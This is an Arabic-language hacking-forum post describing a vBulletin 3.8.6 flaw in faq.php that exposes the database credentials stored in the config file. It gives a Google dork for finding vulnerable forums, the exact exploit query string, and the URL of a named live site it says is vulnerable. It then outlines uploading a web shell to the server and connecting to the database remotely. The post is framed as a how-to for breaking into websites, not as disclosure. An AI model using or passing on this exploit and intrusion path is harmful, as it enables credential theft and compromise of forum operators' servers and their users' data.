السلام عليكم ورحمه اللهطبعا اليوم سنتكلم عن ثغره تسمح لك برويه البيانات المسجله في ملف config وهذه البيانات ستودي طبعا الى اختراق الموقع اذا لم يكن السيرفر-------طبعا فكره الثغره هي البحث داخل المنتدى عن كلمه database من خلال عمليه البحث سيظهر لك كل المعلومات الثمينه عن الملف طبعا الى الاستغلال::::طبعا تروح لقوقلInurl: Powered By Vbulletin Version 3.8.6الثغره موجوده في ملف faq.phpالاستغلال نضيف بعد مسار المنتدى هذا الاستغلال[PHP]faq.php?s=&do=search&q=Database&match=all&titlesonly=0[/PHP]موقع مصاب بالثغره http://www.mcewanforum.com/faq.php?s=&do=search&q=Database&match=all&titlesonly=0لاحظ الصورهطبعا هناك مواقع مرقعه الثغره هذي نزلت الفين وعشره ومانزلت لانه في تلك الفتره اقفل موقه مليورمممكيفيه الاستغلال ----نرفع شل على نفس السيرفر ونقوم بالاتصال بقاعده البينات عن طريق الشلاو نقوم بانزال اي برنامج يتصل من بعد على طريق قواعد البيانات لكن لاسف الكثير من الاستضافاتمانعه الاتصال عن طريق remote connect databaseللمعلوميه مكتشفين الثغره هم فريق فارس المجوسي---اخوكمso9orwww.xp10.com